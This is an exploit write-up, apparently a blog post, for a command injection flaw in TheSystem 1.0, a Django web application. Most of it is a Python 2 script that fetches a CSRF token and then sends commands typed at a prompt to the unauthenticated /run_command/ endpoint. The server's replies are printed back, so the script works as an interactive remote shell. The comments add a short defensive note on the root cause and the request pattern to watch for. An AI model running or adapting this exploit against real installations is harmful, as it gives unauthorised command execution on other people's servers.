TheSystem 1.0 – Command Injection Exploit

I wrote this exploit for “TheSystem 1.0 – Command Injection” just for fun and for practice.

# Exploit Title: TheSystem 1.0 - Command Injection 
# Exploit author : chako
# Date: 2019-10-1
# Software Link: https://github.com/kostasmitroglou/thesystem
# Vuln Reported by: Sadik Cetin 
# Original Post: https://www.exploit-db.com/exploits/47441

#!/usr/bin/python
import requests

# Python 2 script (raw_input and the print statement are used throughout).
#
# It talks to a TheSystem instance on the local machine: every line typed at
# the prompt is sent as the 'command' form field of a POST to /run_command/,
# and the response body is printed back. No login step is performed anywhere
# in this script, so the endpoint is being reached without credentials.
#
# Defensive notes for anyone running or reviewing the application:
#   - The CSRF token is handed out on a plain GET, so Django's CSRF
#     protection does not limit who can submit the form. The fix belongs in
#     the view itself: require authentication and do not execute strings
#     taken from the request.
#   - On the server side, the observable is a GET followed by a POST to
#     /run_command/ carrying a 'command' field.
target = "http://127.0.0.1:8000/run_command/"

while True:
    cmd = raw_input("Command># ")
    print cmd  # echo what was typed, including the final "exit"

    # Typing "exit" ends the session without contacting the server.
    if cmd == "exit":
        break

    # A new session is opened for every command; its first request is a GET
    # whose only purpose is to receive Django's 'csrftoken' cookie.
    http = requests.session()
    csrf_token = http.get(target).cookies['csrftoken']

    # The cookie value is echoed back in the form field Django's CSRF
    # middleware checks, with the Referer header set to the target URL.
    form_fields = {'command': cmd, 'csrfmiddlewaretoken': csrf_token}
    reply = http.post(target, data=form_fields, headers={'Referer': target})

    # Non-success status codes are reported; otherwise the body is shown.
    if not reply.ok:
        print "error code --> ",reply.status_code
        continue
    print reply.text